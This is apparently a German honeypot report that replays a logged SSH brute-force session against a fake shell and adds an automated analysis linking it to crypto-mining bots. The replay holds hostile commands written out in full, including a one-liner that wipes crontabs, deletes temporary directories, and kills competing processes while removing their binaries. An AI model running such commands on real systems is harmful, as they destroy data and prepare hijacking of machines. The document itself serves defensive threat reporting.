ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

06.10.2026, 04:44 UTC · 31 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
descartes-runner / Qwerty

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
descartes-runner@srv01: ~

descartes-runner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
descartes-runner@srv01:~$ uname -m | awk '{printf $1}'
x86_64
descartes-runner@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
261 days, 00:00
descartes-runner@srv01:~$ lspci | egrep VGA && lspci | grep 3D
01:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
01:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
descartes-runner@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
AMD EPYC 7443P 24-Core Processor
descartes-runner@srv01:~$ curl ipinfo.io/org
Cloudflare, Inc.
descartes-runner@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
4
descartes-runner@srv01:~$ nvidia-smi -q | grep "Product Name"
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
descartes-runner@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
descartes-runner@srv01:~$ uname -n | awk '{printf $1}'
render03
descartes-runner@srv01:~$ uname -r | awk '{printf $1}'
5.15.0-88-generic
descartes-runner@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
crontab: no crontab for Admin
rm: cannot remove '/var/tmp/.': Permission denied
rm: cannot remove '/var/tmp/..': Permission denied
rm: cannot remove '/tmp/.': Permission denied
rm: cannot remove '/tmp/..': Permission denied
descartes-runner@srv01:~$ echo Qwerty > /tmp/d.log
descartes-runner@srv01:~$ scp -qt "/var/tmp/mIoTDGxW"
descartes-runner@srv01:~$ scp -qt "/tmp/mIoTDGxW"
descartes-runner@srv01:~$ scp -qt "/dev/shm/mIoTDGxW"
descartes-runner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
descartes-runner@srv01:~$ echo 12345678 > /tmp/d.log
descartes-runner@srv01:~$ scp -qt "/var/tmp/eRmpZTUl"
descartes-runner@srv01:~$ scp -qt "/tmp/eRmpZTUl"
descartes-runner@srv01:~$ scp -qt "/dev/shm/eRmpZTUl"
descartes-runner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
descartes-runner@srv01:~$ echo Administrator > /tmp/d.log
descartes-runner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
descartes-runner@srv01:~$ scp -qt "/var/tmp/BBCkRjdt"
descartes-runner@srv01:~$ scp -qt "/tmp/BBCkRjdt"
descartes-runner@srv01:~$ scp -qt "/dev/shm/BBCkRjdt"
descartes-runner@srv01:~$ echo pass > /tmp/d.log
descartes-runner@srv01:~$ scp -qt "/var/tmp/QPXcBqdW"
descartes-runner@srv01:~$ scp -qt "/tmp/QPXcBqdW"
descartes-runner@srv01:~$ scp -qt "/dev/shm/QPXcBqdW"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich mit einem einfachen Passwort über SSH an. Er führte zunächst zahlreiche Befehle zur Systemerkennung aus, um Hardware und Betriebssystem zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung. Zum Schluss versuchte er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren.

Was die Befehle bewirken

Die Befehle uname, lspci und nvidia-smi sammeln Informationen über Kernel, PCI-Geräte und Grafikkarten, um die Mining-Fähigkeit zu prüfen. Der Befehl crontab -r löscht geplante Aufgaben, während rm Dateien in /tmp und /var/tmp entfernt, um Spuren zu verwischen. Die awk-Schleife identifiziert Prozesse mit über 40 Prozent CPU-Nutzung und beendet sie gewaltsam, um Ressourcen freizugeben. Die scp-Befehle mit dem Parameter -qt kopieren Dateien im stillen Modus in verschiedene temporäre Ordner wie /dev/shm, was typisch für die Platzierung von Schadsoftware ist.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Vorbereitung von Kryptomining hin, da gezielt nach NVIDIA-Grafikkarten gesucht wurde. Das Entfernen konkurrierender Prozesse dient dazu, Rechenleistung für Mining-Software freizumachen. Die Dateiübertragungen dienen vermutlich dem Upload der Mining-Binaries oder Skripte.

Einordnung

Dieses Muster ist sehr verbreitet bei automatisierten Mining-Bots, die kompromittierte Server mit GPU-Ressourcen suchen.